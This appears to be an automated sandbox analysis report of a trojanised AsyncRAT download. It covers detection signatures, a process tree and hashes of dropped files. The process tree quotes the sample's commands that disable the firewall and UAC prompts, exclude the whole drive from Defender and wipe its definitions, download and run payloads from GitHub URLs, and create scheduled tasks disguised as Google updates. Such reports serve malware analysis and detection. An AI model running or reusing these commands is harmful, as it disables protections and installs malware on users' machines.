Analysis

  • max time kernel
    95s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2022 11:24

General

  • Target

    https://github.com/ToolsHacking/AsyncRAT/releases/download/v0.6.8a/AsyncRAT.v0.6.8a.zip

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Malicious RTF document (CVE-2017-0199) 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Async RAT payload 14 IoCs
  • Modifies Windows Firewall 1 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Windows security modification 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 45 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/ToolsHacking/AsyncRAT/releases/download/v0.6.8a/AsyncRAT.v0.6.8a.zip
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2736 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:952
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1624
    • C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe
      "C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe"
      1⤵
      • Drops file in System32 directory
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4328
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\SysWOW64\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe" /elevate
          3⤵
          • Modifies Windows Defender notification settings
          • Checks computer location settings
          • Windows security modification
          • Suspicious use of WriteProcessMemory
          PID:3116
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2644
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3012
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1728
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 1
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2468
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2280
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1324
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5044
            • C:\Windows\SysWOW64\Dism.exe
              "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
              5⤵
                PID:3100
                • C:\Users\Admin\AppData\Local\Temp\1A22B1B6-525E-4330-B6AF-0B9E1974B430\dismhost.exe
                  C:\Users\Admin\AppData\Local\Temp\1A22B1B6-525E-4330-B6AF-0B9E1974B430\dismhost.exe {A6FCB7F9-1599-4498-8F24-F295A8920E00}
                  6⤵
                    PID:3604
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;
                4⤵
                  PID:3084
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\post.vbe"
                    5⤵
                      PID:1052
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\SysWOW64\WScript.exe" "C:\ProgramData\post.vbe" /elevate
                        6⤵
                          PID:5484
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
                            7⤵
                              PID:4924
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
                              7⤵
                                PID:4516
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                                7⤵
                                  PID:5848
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
                                  7⤵
                                    PID:4636
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 1
                                    7⤵
                                      PID:6036
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
                                      7⤵
                                        PID:6028
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
                                        7⤵
                                          PID:4360
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
                                          7⤵
                                            PID:3800
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
                                            7⤵
                                              PID:5264
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/ZolefGonsales43/112/raw/main/b.txt -OutFile C:\ProgramData\h.exe; start C:\ProgramData\h.exe;
                                              7⤵
                                                PID:5336
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-sleep 10; rm -Path C:\ProgramData\h.exe
                                                7⤵
                                                  PID:5388
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                  7⤵
                                                    PID:5180
                                                    • C:\Windows\SysWOW64\netsh.exe
                                                      netsh advfirewall set currentprofile state off
                                                      8⤵
                                                      • Modifies Windows Firewall
                                                      PID:5188
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\Google\src.bat" "
                                              4⤵
                                                PID:5596
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST
                                                  5⤵
                                                  • Creates scheduled task(s)
                                                  PID:2772
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST
                                                  5⤵
                                                  • Creates scheduled task(s)
                                                  PID:5316
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                4⤵
                                                  PID:5624
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    netsh advfirewall set currentprofile state off
                                                    5⤵
                                                    • Modifies Windows Firewall
                                                    PID:6088
                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe"
                                            1⤵
                                              PID:4532
                                              • C:\Windows\SysWOW64\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe"
                                                2⤵
                                                  PID:2312
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\SysWOW64\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe" /elevate
                                                    3⤵
                                                      PID:2164
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
                                                        4⤵
                                                          PID:4212
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
                                                          4⤵
                                                            PID:4764
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                                                            4⤵
                                                              PID:4404
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
                                                              4⤵
                                                                PID:1824
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
                                                                4⤵
                                                                  PID:4484
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 1
                                                                  4⤵
                                                                    PID:3448
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
                                                                    4⤵
                                                                      PID:2412
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
                                                                      4⤵
                                                                        PID:3056
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
                                                                        4⤵
                                                                          PID:4384
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";
                                                                          4⤵
                                                                            PID:4356
                                                                            • C:\Windows\SysWOW64\Dism.exe
                                                                              "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
                                                                              5⤵
                                                                                PID:2252
                                                                                • C:\Users\Admin\AppData\Local\Temp\75B863E9-7AAF-49CB-B2CE-64DD58D238F9\dismhost.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\75B863E9-7AAF-49CB-B2CE-64DD58D238F9\dismhost.exe {0B7EA9C9-5DB8-4360-9111-EC1D8B32F136}
                                                                                  6⤵
                                                                                    PID:4704
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;
                                                                                4⤵
                                                                                  PID:3360
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\post.vbe"
                                                                                    5⤵
                                                                                      PID:5636
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\SysWOW64\WScript.exe" "C:\ProgramData\post.vbe" /elevate
                                                                                        6⤵
                                                                                          PID:2164
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
                                                                                            7⤵
                                                                                              PID:4936
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
                                                                                              7⤵
                                                                                                PID:5644
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                                                                                                7⤵
                                                                                                  PID:1736
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
                                                                                                  7⤵
                                                                                                    PID:6000
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 1
                                                                                                    7⤵
                                                                                                      PID:5928
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
                                                                                                      7⤵
                                                                                                        PID:5556
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
                                                                                                        7⤵
                                                                                                          PID:1588
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
                                                                                                          7⤵
                                                                                                            PID:1000
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
                                                                                                            7⤵
                                                                                                              PID:2312
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/ZolefGonsales43/112/raw/main/b.txt -OutFile C:\ProgramData\h.exe; start C:\ProgramData\h.exe;
                                                                                                              7⤵
                                                                                                                PID:5436
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-sleep 10; rm -Path C:\ProgramData\h.exe
                                                                                                                7⤵
                                                                                                                  PID:1196
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                                                                                  7⤵
                                                                                                                    PID:5232
                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                      netsh advfirewall set currentprofile state off
                                                                                                                      8⤵
                                                                                                                      • Modifies Windows Firewall
                                                                                                                      PID:3984
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\Google\src.bat" "
                                                                                                              4⤵
                                                                                                                PID:2648
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST
                                                                                                                  5⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:5576
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST
                                                                                                                  5⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:3128
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                                                                                4⤵
                                                                                                                  PID:456
                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    netsh advfirewall set currentprofile state off
                                                                                                                    5⤵
                                                                                                                    • Modifies Windows Firewall
                                                                                                                    PID:432

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleCrashHandler.exe

                                                                                                            Filesize

                                                                                                            285KB

                                                                                                            MD5

                                                                                                            e8de6e81b27b60a15b07d63b51f88d2b

                                                                                                            SHA1

                                                                                                            4b786b4b341ae5854a79f3c05e40fe3e224d056d

                                                                                                            SHA256

                                                                                                            e66c102ceee633205286f122458a1bade0738a35cdfd7988ec442886aa5c5007

                                                                                                            SHA512

                                                                                                            3cf1c625031be850df00ed5db02a54a4d647a6cdaedc325fa876e4efdfce0d552fe1cd60341ea5a16664be23a13d98dd151c17f5eec04503329ea305b65976ef

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleCrashHandler64.exe

                                                                                                            Filesize

                                                                                                            364KB

                                                                                                            MD5

                                                                                                            33f147b0c09c965f5a4e7eeeff2d9659

                                                                                                            SHA1

                                                                                                            c71f0450c603a3fc027c2260b2f6e6090684a169

                                                                                                            SHA256

                                                                                                            14fd1df8f4bd086f603e2de7552a79bd80afba0708b36e5791461fd195d7ed8c

                                                                                                            SHA512

                                                                                                            8355ea067ab8c71b290b0fbdbebc95d3e94356a7b9076e0bd4ca54f2c5d5b9e49bbf8b2f68889b5f5fcdb64231cafa9d35d2b8e2f746b0fce65092fb6d19b86b

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdate.exe

                                                                                                            Filesize

                                                                                                            150KB

                                                                                                            MD5

                                                                                                            59ea38acbca05610bfee326da3f2d96b

                                                                                                            SHA1

                                                                                                            5bbc85ca56e0871f56360cc9c3fad1d63e9b23a5

                                                                                                            SHA256

                                                                                                            cb7f48f36c649bdb12fd09d8fcb60d99efbff44729515fa3cc77f4cdb18d99b7

                                                                                                            SHA512

                                                                                                            b1fe1d99ddb8f2c53a1cb3756b0f3dcba5c449721b9aa3ecba44c4316516b60c81163f3198ff869ef68ff8980bc7de7d8142988a05f6c9e9f574b942b622d321

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateBroker.exe

                                                                                                            Filesize

                                                                                                            97KB

                                                                                                            MD5

                                                                                                            bd2e5162958c2cfa6cfa16d68ec20bcf

                                                                                                            SHA1

                                                                                                            15226fe919bab55c03b7c51012e432b5b164e2af

                                                                                                            SHA256

                                                                                                            1686a0bc9c13c1c57d769920dbb6da02e240cdcea6078822387f986a49fbca17

                                                                                                            SHA512

                                                                                                            2347bc6f72609f5b29999344001d02627ba4c0089d0f386520fcafced995a7b91090386dd4a868280a72978ae8447a25c4e2bb2773638cb72683bf0be8261fad

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateComRegisterShell64.exe

                                                                                                            Filesize

                                                                                                            177KB

                                                                                                            MD5

                                                                                                            7e6579e6a59157b3a8672d6c43750093

                                                                                                            SHA1

                                                                                                            50fd4925e975d4a672d6d79fa4523149ad893d6d

                                                                                                            SHA256

                                                                                                            788f7e65e69484eee27d5a34311357aead31e905fe0f85f165a77d53a12f53ab

                                                                                                            SHA512

                                                                                                            0fe13270cb3bf8e90f6b92423a3da9410e811048a62d7193ebfb873225180e29b9feb128a1d2b2b1d8a4e906bfa48e5009cc5b8c20e087743fb68e9eb6920deb

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateCore.exe

                                                                                                            Filesize

                                                                                                            211KB

                                                                                                            MD5

                                                                                                            a801ffd44995fc011fe9adf267eb76ca

                                                                                                            SHA1

                                                                                                            93002d350f2d68ac2cea3f568080e12ca116e2ba

                                                                                                            SHA256

                                                                                                            fbddbf7c0f394e9600bc15b38f9829cafd45f252397d5ebd5ad7d07c575be344

                                                                                                            SHA512

                                                                                                            4a17a33a69ccdab6f06437bd5f98de2eaa2dd3873579c4a8d948735b3f1156dfbd62ed6d23be0d54b208208605bce28f490380c5a716e64a846973cceaa9ca01

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateOnDemand.exe

                                                                                                            Filesize

                                                                                                            97KB

                                                                                                            MD5

                                                                                                            144968379c4265e662d5a4ee6dd261e6

                                                                                                            SHA1

                                                                                                            7ec5630f62ecf6055f9e02a4b5323fd1a0a83b6a

                                                                                                            SHA256

                                                                                                            fa56ba25861f1b5040afd04bfbfd36353004cd6b2c457971fb01db26ff002f35

                                                                                                            SHA512

                                                                                                            23976bae55790d8ce669167930f6371f8bf8717b60e99ddab6ced095b4e5bd1251ec28101b3191e9ea64d71e964545f829434b2aabc2f4ecea028631b29f1b22

                                                                                                          • C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateSetup.exe

                                                                                                            Filesize

                                                                                                            52.6MB

                                                                                                            MD5

                                                                                                            215b8088f772f606f763dcdb6e5087d5

                                                                                                            SHA1

                                                                                                            5f006058c8acec0974001ab0ee08ef9e966265a9

                                                                                                            SHA256

                                                                                                            fdc1b6915718bb92cfd0b9f42099eb95cc77d5323c5167cb5327002fa9d789fe

                                                                                                            SHA512

